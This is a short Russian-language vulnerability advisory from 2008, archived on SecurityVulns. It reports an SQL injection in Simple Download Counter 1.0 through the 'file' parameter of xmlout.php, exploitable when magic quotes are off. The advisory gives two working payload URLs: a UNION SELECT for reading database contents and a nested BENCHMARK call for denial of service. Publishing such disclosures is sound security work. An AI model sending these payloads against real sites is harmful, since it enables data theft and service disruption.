Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:20537
HistorySep 20, 2008 - 12:00 a.m.

SQL Injection vulnerability in Simple Download Counter

2008-09-2000:00:00
vulners.com
16

Здравствуйте 3APA3A!

Сообщаю вам о найденной мною SQL Injection уязвимости в Simple Download Counter.

SQL Injection:

Её можно использовать как для получения информации (в частности других веб приложений) с БД:

http://site/xmlout.php?file='%20union%20select%20*%20from%20table/*

Так и для проведения DoS атак:

http://site/xmlout.php?file='%20and%20benchmark(10000000,benchmark(10000000,md5(now())))/*

Атака возможна при magic quotes off. Уязвима версия Simple Download Counter 1.0.

Дополнительная информация о данной уязвимости у меня на сайте:
http://websecurity.com.ua/2448/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua